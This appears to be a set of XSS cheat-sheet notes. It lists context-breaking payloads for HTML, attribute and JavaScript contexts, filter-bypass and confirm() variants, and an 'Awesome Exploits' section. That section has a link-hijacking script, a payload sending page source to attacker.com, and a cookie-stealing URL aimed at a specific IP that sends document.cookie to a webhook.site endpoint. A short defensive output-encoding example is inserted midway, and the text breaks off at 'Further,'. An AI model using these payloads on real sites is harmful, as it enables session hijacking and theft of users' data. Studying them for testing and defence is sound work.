XSS
https://github.com/payloadbox/xss-payload-list
IMPORTANT TIP: Always look at the source code, close the current HTML tag, then put the JS payload.
<script>print()</script>
This pops up the browser print dialog, which is unlikely to be blocked by any browser.
Tip: Many modern web applications use cross-domain IFrames to handle user input, so even if the web form is vulnerable to XSS, it would not be a vulnerability on the main web application. This is why we show the value of window.origin in the alert box instead of a static value like 1. In this case the alert box reveals the URL it is being executed on and confirms which form is the vulnerable one, in case an IFrame was being used.
<script>alert(window.origin)</script>
As some modern browsers may block the alert() JavaScript function in specific locations, it may be handy to know a few other basic XSS payloads to verify the existence of XSS. One such payload is <plaintext>, which stops rendering the HTML code that comes after it and displays it as plain text.
<script>alert(1)</script>
Check how the text is reflected and craft the query accordingly!
<img src=a onerror=alert("xss")>
<BODY ONLOAD=javascript:alert(1)>
If alert() is being filtered:
eval("ale" + "rt('xss')")
If <> brackets are filtered:
"onmouseover="alert(1)
If single quotes (') are filtered, use double quotes, and vice versa.
One-stop payload!
Awesome Context Breaking
HTML Context
Case: <tag>You searched for $input. </tag>
<svg onload=alert()>
</tag><svg onload=alert()>
Attribute Context
Case: <tag attribute="$input">
"><svg onload=alert()>
"><svg onload=alert()><b attr="
" onmouseover=alert() "
"onmouseover=alert()//
"autofocus/onfocus="alert()
JavaScript Context
Case: <script> var something = '$input'; </script>
'-alert()-'
'-alert()//'
'}alert(1);{'
'}%0Aalert(1);%0A{'
</script><svg onload=alert()>
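As an added defensive example (not part of the original notes), the following JavaScript renders the three templates from this section with context-appropriate output encoding and checks that each of the listed context-breaking payloads stays inert; the element and variable names, the encoders and the structural checks are this example's own assumptions.

```javascript
// Added example (not from the original page): context-aware output encoding for the
// three reflection contexts above, checked against the page's own payloads. Encoders
// are written out for illustration; prefer a templating engine's escaping in production.
// HTML text context: <tag>You searched for $input.</tag>
const encodeHtmlText = (s) =>
  s.replace(/[&<>"']/g, (c) =>
    ({ "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" }[c]));
// Quoted attribute context: <tag attribute="$input">. Every non-alphanumeric character
// becomes a numeric reference, so quotes, spaces, "/" and "=" cannot close the attribute
// or start a new one (e.g. "autofocus/onfocus=).
const encodeHtmlAttr = (s) =>
  s.replace(/[^A-Za-z0-9]/g, (c) => `&#x${c.charCodeAt(0).toString(16)};`);
// JavaScript string context: <script>var something = '$input';</script>. \xHH / \uHHHH
// escapes keep quotes, "<", "/" and newlines inert inside the literal, so neither
// '-alert()-' nor </script> can leave the string.
const encodeJsString = (s) =>
  s.replace(/[^A-Za-z0-9]/g, (c) => {
    const hex = c.charCodeAt(0).toString(16);
    return hex.length <= 2 ? `\\x${hex.padStart(2, "0")}` : `\\u${hex.padStart(4, "0")}`;
  });

// The page's three templates (element and variable names are this example's own).
const TEMPLATES = {
  text: (v) => `<p>You searched for ${v}.</p>`,
  attr: (v) => `<input value="${v}">`,
  js: (v) => `<script>var something = '${v}';</script>`,
};
const ENCODERS = { text: encodeHtmlText, attr: encodeHtmlAttr, js: encodeJsString };

function render(context, input, encode = true) {
  return TEMPLATES[context](encode ? ENCODERS[context](input) : input);
}

// Containment: no new tag or attribute delimiter, and the JS literal stays one string.
function contained(context, input, encode = true) {
  const out = render(context, input, encode);
  const tags = (out.match(/<[A-Za-z]/g) || []).length; // the template's own tag only
  const dq = (out.match(/"/g) || []).length;
  const sq = (out.match(/'/g) || []).length;
  if (context === "text") return tags === 1;
  if (context === "attr") return tags === 1 && dq === 2;
  return tags === 1 && sq === 2 && !/[\r\n]/.test(out);
}

// Constructed sample: the context-breaking payloads listed above, with %0A decoded.
const PAYLOADS = {
  text: ["</tag><svg onload=alert()>"],
  attr: ['"><svg onload=alert()>', '" onmouseover=alert() "', '"autofocus/onfocus="alert()'],
  js: ["'-alert()-'", "'}\nalert(1);\n{'", "</script><svg onload=alert()>"],
};
```

Calling contained(ctx, payload, false) for any of these returns false, while the encoded rendering returns true for every listed payload.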
Awesome Confirm Variants
Yep, confirm because alert is too mainstream.
confirm()
confirm``
(confirm``)
{confirm``}
[confirm``]
(((confirm)))``
co\u006efirm()
new class extends confirm``{}
[8].find(confirm)
[8].map(confirm)
[8].some(confirm)
[8].every(confirm)
[8].filter(confirm)
[8].findIndex(confirm)
Awesome Exploits
Replace all links
Array.from(document.getElementsByTagName("a")).forEach(function(i) {
i.href = "https://attacker.com";
});
Source Code Stealer
<svg/onload="(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML">
XSS where markdown is reflected "unsafely". The following is a valid payload; it is an HTML injection through a markdown link whose target is a data: URL.
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
Reaching our own server using XSS and stealing sensitive information
http://18.225.156.202:9090/blog?blogNumber=2%22%3E%3Cimg%20src=x%20onerror=this.src=%27https://webhook.site/e20454b9-297d-47d2-bb93-9da689061414/?%27%2bdocument.cookie;%3E
Payload: 2"><img src=x onerror=this.src='https://webhook.site/e20454b9-297d-47d2-bb93-9da689061414/?'+document.cookie;>
Further,